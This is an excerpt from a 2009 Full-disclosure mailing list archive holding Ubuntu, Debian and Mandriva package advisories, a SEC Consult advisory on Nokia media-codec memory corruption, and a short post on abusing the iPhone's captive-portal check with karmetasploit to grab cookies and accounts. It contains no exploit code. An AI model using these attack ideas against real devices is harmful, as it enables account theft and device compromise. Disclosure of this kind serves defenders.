http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.2_i386.deb Size/MD5: 175048 01226d438f325312684575560d86d93b http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.2_i386.deb Size/MD5: 552280 36c3a1e37d12f1992346a057e4dab075 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.2_i386.deb Size/MD5: 122400 44cb0efa99a513084835be466da2cb7d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.2_i386.deb Size/MD5: 5048 db565d6e40fa1b15e6ff9b87a599c0d7 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.2_i386.deb Size/MD5: 9942 c7f799a523da81cee7c90ade65be2ccd lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.2_lpia.deb Size/MD5: 177116 df191c9d5e2f48103589d92a59b902d1 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.2_lpia.deb Size/MD5: 554842 2d10224badec0434fbb9d21d432df89d http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.2_lpia.deb Size/MD5: 123556 534d8b03274794d0563a3b48001143c7 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.2_lpia.deb Size/MD5: 4920 264e617e42f1c8972cb1b2bb18a91574 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.2_lpia.deb Size/MD5: 9976 e5940f1dbb7d090a4e5d47cca0daeca2 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.2_powerpc.deb Size/MD5: 223238 2385fe8b199cce7295eaea9282cacf24 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.2_powerpc.deb Size/MD5: 576794 51814c281f84fe2e0650d3f8e029ac4a http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.2_powerpc.deb Size/MD5: 134016 3df0fd7a4ad96106e2f5143f1645b102 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.2_powerpc.deb Size/MD5: 7514 5963503e765f0fe71ffa80fbc60c162f http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.2_powerpc.deb Size/MD5: 13286 3f3851bf7186b2d4450d35beeec0bb4d sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.2_sparc.deb Size/MD5: 178640 086f9b0f2e83f879e323fd924f8a89f2 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.2_sparc.deb Size/MD5: 558202 b334310f53743de237845e24fcd911ec http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.2_sparc.deb Size/MD5: 122160 95fd3e3346b8dce74e274239d00c018b http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.2_sparc.deb Size/MD5: 4800 4a09138aa5f408d8fe49057f90cd0df1 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.2_sparc.deb Size/MD5: 10710 18641ce46b309baeb923165dd8e03158 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-11ubuntu0.8.10.1.diff.gz Size/MD5: 37962 6c0956eecb7503bdb31a1bd4299efe47 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-11ubuntu0.8.10.1.dsc Size/MD5: 1328 7548341cdd1a4a9bae7c793b6f677233 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.8.2-11ubuntu0.8.10.1_all.deb Size/MD5: 334688 eff9827309f80a957196e9cd4da695d8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.8.10.1_amd64.deb Size/MD5: 250518 61fe3d4dd8def51dbd2b5d9b4159a9bc http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.8.10.1_amd64.deb Size/MD5: 134084 c2adab0fb711634f47e695f3dd7447f8 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.8.10.1_amd64.deb Size/MD5: 6286 4b2563a3b767209061646fa6ae9ac85b http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.8.10.1_amd64.deb Size/MD5: 11898 81a456c5d470799230c6a44f9cc8f9b9 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.8.2-11ubuntu0.8.10.1_amd64.deb Size/MD5: 191424 82a9fa8eb070e32116b0d8ecd5a22e0d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.8.10.1_i386.deb Size/MD5: 233298 a01eb038a2ccbef8b6603525bc3f2f75 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.8.10.1_i386.deb Size/MD5: 125878 4eda3acf59c21aba5e1cc89e96bfa8cc http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.8.10.1_i386.deb Size/MD5: 6272 a6ec88be551d729364d27af4863e1b11 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.8.10.1_i386.deb Size/MD5: 11236 359d02f2dcdad53dcf72d0619aff697b http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.8.2-11ubuntu0.8.10.1_i386.deb Size/MD5: 176054 42b7f0efbbc73b45d6e69053ebf33671 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.8.10.1_lpia.deb Size/MD5: 235774 ca05ad7d9e13ada710db91e738800eab http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.8.10.1_lpia.deb Size/MD5: 127584 cf7c86c00c4a0e05cac37039288965f0 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.8.10.1_lpia.deb Size/MD5: 6132 a865f92bff1a6c22b927ee8af097c433 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.8.10.1_lpia.deb Size/MD5: 11282 733acc73b8be40399063ff28128525f5 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-tools_3.8.2-11ubuntu0.8.10.1_lpia.deb Size/MD5: 178278 523c412323f658d260ae6a4d2ff40966 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.8.10.1_powerpc.deb Size/MD5: 256510 d4b027ddeb929f3589956ba496cffba0 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.8.10.1_powerpc.deb Size/MD5: 137148 e32d2bdd0d4a7cc71eec5e7daed52aa9 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.8.10.1_powerpc.deb Size/MD5: 8724 cc701a74b724ca482b21a3dc321949c3 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.8.10.1_powerpc.deb Size/MD5: 14234 cbff4f6e6faddfde029ff78ec9c48afb http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-tools_3.8.2-11ubuntu0.8.10.1_powerpc.deb Size/MD5: 221040 f917935a1761ef9848e8c7c10e0ef06b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.8.10.1_sparc.deb Size/MD5: 237666 5d6d33cc67ef0d14bd626ccb4dd9bcb6 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.8.10.1_sparc.deb Size/MD5: 123990 190cefef6ceb37c906aecaf1bf59b876 http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.8.10.1_sparc.deb Size/MD5: 6006 6ec8001760781f1af9d8592866ff82fe http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.8.10.1_sparc.deb Size/MD5: 12046 a2b4639c81cb79b31b0646657205fa35 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-tools_3.8.2-11ubuntu0.8.10.1_sparc.deb Size/MD5: 183412 8ff9e8d6a32d80872131327e5203796c Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-11ubuntu0.9.04.1.diff.gz Size/MD5: 37962 438146f23bcd7888fcc66c7b9d78098b http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-11ubuntu0.9.04.1.dsc Size/MD5: 1328 9ec573172e0fde174b56d0a3956ee35b http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz Size/MD5: 1333780 e6ec4ab957ef49d5aabc38b7a376910b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.8.2-11ubuntu0.9.04.1_all.deb Size/MD5: 334670 fa4a10e51620299585fa1642196f2887 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-11ubuntu0.9.04.1_amd64.deb Size/MD5: 191466 a61b82a3393f44e40cd2cc0f640eb6c6 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.9.04.1_amd64.deb Size/MD5: 250604 cd4538b261cc9003e7c131adda8b51ca http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.9.04.1_amd64.deb Size/MD5: 134104 38fa2282b5e992c72a4ac79e0ece52b0 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.9.04.1_amd64.deb Size/MD5: 6286 401262f1a09831f0130f0db2872c97f6 http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.9.04.1_amd64.deb Size/MD5: 11898 bdf96619188143fe417e8fa3bc5f780d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-11ubuntu0.9.04.1_i386.deb Size/MD5: 176050 aa334ea8a28d5274741368d08b0f795d http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.9.04.1_i386.deb Size/MD5: 233334 2f3bfd25e51a9cca95f4c58646318d29 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.9.04.1_i386.deb Size/MD5: 125970 3ceceb06c0b6b94fa508e008f19408b7 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.9.04.1_i386.deb Size/MD5: 6272 35faf1e62dc2e57509ef98116b4c7cfb http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.9.04.1_i386.deb Size/MD5: 11228 0abf911853cdb7cd1020f5c43782ab92 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-11ubuntu0.9.04.1_lpia.deb Size/MD5: 178280 db957830b08ec26fc211e78674f175c7 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.9.04.1_lpia.deb Size/MD5: 235772 146d7fbd61e3885873c2d884c3f289be http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.9.04.1_lpia.deb Size/MD5: 127566 bec17756ac7d7c5c94fb4823b297b6df http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.9.04.1_lpia.deb Size/MD5: 6126 36ebd0a2f1faaa2d67cdc9687377047b http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.9.04.1_lpia.deb Size/MD5: 11276 efd0a2c2218bfbcd1a9211d85945fa43 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-11ubuntu0.9.04.1_powerpc.deb Size/MD5: 221080 3ba1c50579c20918faaef6191ed041eb http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.9.04.1_powerpc.deb Size/MD5: 256338 eeb0f7815019f42674e3ed5fdfc72036 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.9.04.1_powerpc.deb Size/MD5: 136980 638fb9b42c406d00b1510a926b5ed3ba http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.9.04.1_powerpc.deb Size/MD5: 8726 50665d1f710dba6dc2742e2bb57acf02 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.9.04.1_powerpc.deb Size/MD5: 14228 3f0ee5ed9b9d24b19ec162f1c71127ce sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-11ubuntu0.9.04.1_sparc.deb Size/MD5: 183404 2852bdbf720008437395f7821c827fd4 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-11ubuntu0.9.04.1_sparc.deb Size/MD5: 237662 9da18282c48f96aabf98965c0717d9b2 http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-11ubuntu0.9.04.1_sparc.deb Size/MD5: 123884 1600707f7478f01789738311510f598a http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-11ubuntu0.9.04.1_sparc.deb Size/MD5: 5970 15efadc4f18985aa1fadc50bec55d099 http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-11ubuntu0.9.04.1_sparc.deb Size/MD5: 12018 1475302ae62826aced512ca859a2c237 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090706/123f696d/attachment.bin From research at sec-consult.com Tue Jul 7 08:45:31 2009 From: research at sec-consult.com (Bernhard Mueller) Date: Tue, 7 Jul 2009 09:45:31 +0200 Subject: [Full-disclosure] SEC Consult SA-20090707-0 :: Symbian S60 / Nokia firmware media codecs multiple memory corruption vulnerabilities Message-ID: <1246952731.4386.2.camel@b4byl0n> SEC Consult Security Advisory < 20090707-0 > ========================================================================== title: Symbian S60 / Nokia firmware media codecs multiple memory corruption vulnerabilities vulnerable version: All Nokia smartphones with multimedia capabilities are likely vulnerable (tested on E61, E71, N96) impact: Critical homepage: http://www.nokia.com/ found: May 2009 by: Bernhard Mueller / SEC Consult Vulnerability Lab ========================================================================== Vulnerability overview: ----------------------- Multiple memory corruption vulnerabilities have been identified in multimedia codecs used by the RealPlayer and MMS viewer on Nokia's Symbian/S60 based smartphones. An attacker could leverage these bugs to gain control of the program counter register and execute arbitrary code on a target smartphone. The bugs can be triggered directly inside the MMS viewer of the target, by sending an MMS with an embedded video file. Vulnerability description: -------------------------- This advisory describes multiple bugs found within several libraries: * rarender.dll * STH264HWDecHwDevice.dll * clntcore.dll * HxMmfCtrl.dll * mdfh264payloadformat.dll * MMFDevSound.dll * ArmRV89Codec.dll The effects that can be triggered with manipulated video files range fromuser panic exceptions to exploitable data abort conditions that can be used to indirectly influence function pointers and gain control of the exploited process. A more detailed analysis, as well as the testing approach used to identifiy the vulnerabilities, can be found in the whitepaper "From 0 to 0day in Symbian" available at: https://www.sec-consult.com/files/Pwning_Nokia_V1.03_PUB.pdf Proof of concept: ----------------- SEC Consult will not release a full proof of concept exploit to the public. Vulnerable versions: -------------------- All Nokia / Symbian S60 smartphones with RealPlayer are likely vulnerable. The test and debugging subject was a Nokia N96 smartphone with firmware version 11.018. The resulting files were also sent to a Nokia E61i and a Nokia E71 and crashed either the MMS application or the operating system. Vendor contact timeline: ------------------------ 2008-06-13: Full fuzzing results sent to Nokia 2009-06-30: Whitepaper sent to Nokia 2009-07-06: Limited public release Patch: ------ No patch is available at the time of this writing. Workaround: ----------- >From an end user perspective, security best practices should be applied that are similar to those required on desktop PCs. The following list contains some of the most important guidelines: . * Perform regular software updates * Do not install unnecessary applications and services * Use Anti Virus software * Take care when browsing the web * Do not open SMS, MMS or emails from unknown sources25 -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2009 From max.moser at gmail.com Tue Jul 7 09:35:09 2009 From: max.moser at gmail.com (Max Moser) Date: Tue, 7 Jul 2009 10:35:09 +0200 Subject: [Full-disclosure] iUsability Pwned - aka. - Apple iphone automatically connects karmetasploit Message-ID: Hi there, just in case you didn't see the post at my blog http://remote-exploit.blogspot.com/ here is a small summit of the problem: The iPhone running OS 3 has a stupid usability feature. It seems like the iPhone is automatically opening a browser when joining a network. When joining a network, the iPhone tries to do the following: 1. DNS queries for www.apple.com 2. Opening http://www.apple.com/library/test/success.html When both are successful, then fine... the phone gets back "success" and everything is ok. When both are failing... that's fine as well because then the phone assumes that the Internet connection is not up and running. If the phone can successfully query the name but get back any different content than "Success" it assumes that there is a captive portal which requires you to authenticate first to get access to the Internet. (Hotels, Hotspots etc) It seems like Apple was thinking.. damn that's annoying for the user... lets open up Safari automatically if this special case comes into place :-) Usability kills security .... together with karmetasploit its a very evil thing. Get IPhone cookies, accounts and maybe even system control... depending on the bugs you have left to test. You can see the whole thing as a video @ vimeo http://www.vimeo.com/5466236 .... now lets find some new safari bugs :-) Greetings Max From nion at debian.org Tue Jul 7 17:58:13 2009 From: nion at debian.org (Nico Golde) Date: Tue, 7 Jul 2009 18:58:13 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1828-1] New ocsinventory-agent packages fix arbitrary code execution Message-ID: <20090707165813.GA26389@ngolde.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-1828-1 security at debian.org http://www.debian.org/security/ Nico Golde July 7th, 2009 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : ocsinventory-agent Vulnerability : insecure module search path Problem type : local Debian-specific: no Debian bug : 506416 CVE ID : CVE-2009-0667 It was discovered that the ocsinventory-agent which is part of the ocsinventory suite, a hardware and software configuration indexing service, is prone to an insecure perl module search path. As the agent is started via cron and the current directory (/ in this case) is included in the default perl module path the agent scans every directory on the system for its perl modules. This enables an attacker to execute arbitrary code via a crafted ocsinventory-agent perl module placed on the system. The oldstable distribution (etch) does not contain ocsinventory-agent. For the stable distribution (lenny), this problem has been fixed in version 1:0.0.9.2repack1-4lenny1. For the testing distribution (squeeze), this problem has been fixed in version 1:0.0.9.2repack1-5 For the unstable distribution (sid), this problem has been fixed in version 1:0.0.9.2repack1-5. We recommend that you upgrade your ocsinventory-agent packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/o/ocsinventory-agent/ocsinventory-agent_0.0.9.2repack1-4lenny1.dsc Size/MD5 checksum: 1334 cf43f5ea659d2ec4d4b854953e8c18c6 http://security.debian.org/pool/updates/main/o/ocsinventory-agent/ocsinventory-agent_0.0.9.2repack1.orig.tar.gz Size/MD5 checksum: 207786 ce09d43d41596641dbb1bd66dc4f2b62 http://security.debian.org/pool/updates/main/o/ocsinventory-agent/ocsinventory-agent_0.0.9.2repack1-4lenny1.diff.gz Size/MD5 checksum: 12171 d718e83817905e2e22edcfa25fa863b4 Architecture independent packages: http://security.debian.org/pool/updates/main/o/ocsinventory-agent/ocsinventory-agent_0.0.9.2repack1-4lenny1_all.deb Size/MD5 checksum: 83362 1d103ed0bb2520dfb3fc8b430ae30a6c These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkpTfqUACgkQHYflSXNkfP/klACfUgQzQiRyrSj9zhbyTHmLaR5k iyUAoIoO6IksVxyCD0r+9YnYjBrITi9K =Dk2K -----END PGP SIGNATURE----- From security at mandriva.com Tue Jul 7 19:54:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Tue, 07 Jul 2009 20:54:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:148 ] kernel Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:148 http://www.mandriva.com/security/ _______________________________________________________________________ Package : kernel Date : July 7, 2009 Affected: 2009.1 _______________________________________________________________________ Problem Description: Some vulnerabilities were discovered and corrected in the Linux 2.6 kernel: Buffer overflow in the RTL8169 NIC driver (drivers/net/r8169.c) in the Linux kernel before 2.6.30 allows remote attackers to cause a denial of service (kernel memory corruption and crash) via a long packet. (CVE-2009-1389) The inode double locking code in fs/ocfs2/file.c in the Linux kernel 2.6.30 before 2.6.30-rc3, 2.6.27 before 2.6.27.24, 2.6.29 before 2.6.29.4, and possibly other versions down to 2.6.19 allows local users to cause a denial of service (prevention of file creation and removal) via a series of splice system calls that trigger a deadlock between the generic_file_splice_write, splice_from_pipe, and ocfs2_file_splice_write functions. (CVE-2009-1961) The nfs_permission function in fs/nfs/dir.c in the NFS client implementation in the Linux kernel 2.6.29.3 and earlier, when atomic_open is available, does not check execute (aka EXEC or MAY_EXEC) permission bits, which allows local users to bypass permissions and execute files, as demonstrated by files on an NFSv4 fileserver. (CVE-2009-1630) Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size. (CVE-2009-1385) Multiple buffer overflows in the cifs subsystem in the Linux kernel before 2.6.29.4 allow remote CIFS servers to cause a denial of service (memory corruption) and possibly have unspecified other impact via (1) a malformed Unicode string, related to Unicode string area alignment in fs/cifs/sess.c; or (2) long Unicode characters, related to fs/cifs/cifssmb.c and the cifs_readdir function in fs/cifs/readdir.c. (CVE-2009-1633) Additionally, the kernel package was updated to the Linux upstream stable version 2.6.29.6. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.1: f435c61c35d894ff54c61031cc94744d 2009.1/i586/alsa_raoppcm-kernel-2.6.29.6-desktop-1mnb-0.5.1-2mdv2008.0.i586.rpm ee255657ddd152693e8c717daca10a3e 2009.1/i586/alsa_raoppcm-kernel-2.6.29.6-desktop586-1mnb-0.5.1-2mdv2008.0.i586.rpm e8bafb710ffcf118196df559a777e2e6 2009.1/i586/alsa_raoppcm-kernel-2.6.29.6-server-1mnb-0.5.1-2mdv2008.0.i586.rpm 855d32b4106e74f04b5175ca40ac2dd9 2009.1/i586/alsa_raoppcm-kernel-desktop586-latest-0.5.1-1.20090706.2mdv2008.0.i586.rpm 688df8ffd14c32b944d589dbc2beeac6 2009.1/i586/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20090706.2mdv2008.0.i586.rpm 3db0b2ba2e044aa79f3bf67ad65c5bdb 2009.1/i586/alsa_raoppcm-kernel-server-latest-0.5.1-1.20090706.2mdv2008.0.i586.rpm 4924904685252518ec658c22bce8e9af 2009.1/i586/broadcom-wl-kernel-2.6.29.6-desktop-1mnb-5.10.79.10-1mdv2009.1.i586.rpm 0f0c490a60e6de3bd32b353bc0001832 2009.1/i586/broadcom-wl-kernel-2.6.29.6-desktop586-1mnb-5.10.79.10-1mdv2009.1.i586.rpm 11edc40fe4be2b9b3e1547141012d96d 2009.1/i586/broadcom-wl-kernel-2.6.29.6-server-1mnb-5.10.79.10-1mdv2009.1.i586.rpm ecc74c51114ece3e5d0eec03bbf734c0 2009.1/i586/broadcom-wl-kernel-desktop586-latest-5.10.79.10-1.20090706.1mdv2009.1.i586.rpm b767c3f89dd5e458fe16911c4431b4b5 2009.1/i586/broadcom-wl-kernel-desktop-latest-5.10.79.10-1.20090706.1mdv2009.1.i586.rpm 91b6efa39ee9905c1f78adf856b3c59c 2009.1/i586/broadcom-wl-kernel-server-latest-5.10.79.10-1.20090706.1mdv2009.1.i586.rpm 133c9905650edb646b1c815b4fd20fb3 2009.1/i586/em8300-kernel-2.6.29.6-desktop-1mnb-0.17.2-1mdv2009.1.i586.rpm 514a521a7579dee227768934987b4cc2 2009.1/i586/em8300-kernel-2.6.29.6-desktop586-1mnb-0.17.2-1mdv2009.1.i586.rpm cedaae063d47d1edccf0c3c1a462d514 2009.1/i586/em8300-kernel-2.6.29.6-server-1mnb-0.17.2-1mdv2009.1.i586.rpm 83ceeb110047fd56840f502a2cde00f2 2009.1/i586/em8300-kernel-desktop586-latest-0.17.2-1.20090706.1mdv2009.1.i586.rpm fa7d4354ebe94315a4939c1aca89ab5b 2009.1/i586/em8300-kernel-desktop-latest-0.17.2-1.20090706.1mdv2009.1.i586.rpm 09536165e6417581fdcbad39fb5f48f2 2009.1/i586/em8300-kernel-server-latest-0.17.2-1.20090706.1mdv2009.1.i586.rpm e6dcccbde85e2e74b5da68e3001643f3 2009.1/i586/fcpci-kernel-2.6.29.6-desktop-1mnb-3.11.07-7mdv2009.0.i586.rpm 86f67be52cba5d87d1c0064544730ce1 2009.1/i586/fcpci-kernel-2.6.29.6-desktop586-1mnb-3.11.07-7mdv2009.0.i586.rpm df2cea05201effadc9970b31fad5c356 2009.1/i586/fcpci-kernel-2.6.29.6-server-1mnb-3.11.07-7mdv2009.0.i586.rpm 54c77f5c13bbf75d0939779e85ab9e4d 2009.1/i586/fcpci-kernel-desktop586-latest-3.11.07-1.20090706.7mdv2009.0.i586.rpm 83b31239896a64d256395b49ee8033d7 2009.1/i586/fcpci-kernel-desktop-latest-3.11.07-1.20090706.7mdv2009.0.i586.rpm 54b0a2523a188b589fe92b691a8c7935 2009.1/i586/fcpci-kernel-server-latest-3.11.07-1.20090706.7mdv2009.0.i586.rpm f5ea702346cad55804529ba56f2f5f4a 2009.1/i586/fglrx-kernel-2.6.29.6-desktop-1mnb-8.600-2mdv2009.1.i586.rpm 3f36a84eeada16bc9c89509ef4e14995 2009.1/i586/fglrx-kernel-2.6.29.6-desktop586-1mnb-8.600-2mdv2009.1.i586.rpm 148cbd44125552c028211b1e326e8296 2009.1/i586/fglrx-kernel-2.6.29.6-server-1mnb-8.600-2mdv2009.1.i586.rpm 4f73affb4d19354d863ea18d75b6508b 2009.1/i586/fglrx-kernel-desktop586-latest-8.600-1.20090706.2mdv2009.1.i586.rpm aa3d1e8ddd55e331c3459e1a7e2a714a 2009.1/i586/fglrx-kernel-desktop-latest-8.600-1.20090706.2mdv2009.1.i586.rpm cb651eb0fb138770239e532ace29d050 2009.1/i586/fglrx-kernel-server-latest-8.600-1.20090706.2mdv2009.1.i586.rpm cc4f81bcc78c0e910a53d163a20fc67e 2009.1/i586/hcfpcimodem-kernel-2.6.29.6-desktop-1mnb-1.18-1mdv2009.1.i586.rpm 80d98f21f56eb108239fa9c8ce3d8999 2009.1/i586/hcfpcimodem-kernel-2.6.29.6-desktop586-1mnb-1.18-1mdv2009.1.i586.rpm 170321d0ea33d49e6bbfe567d84d86c1 2009.1/i586/hcfpcimodem-kernel-2.6.29.6-server-1mnb-1.18-1mdv2009.1.i586.rpm 1a768440f1ec374f70f8047e1aa7e6c1 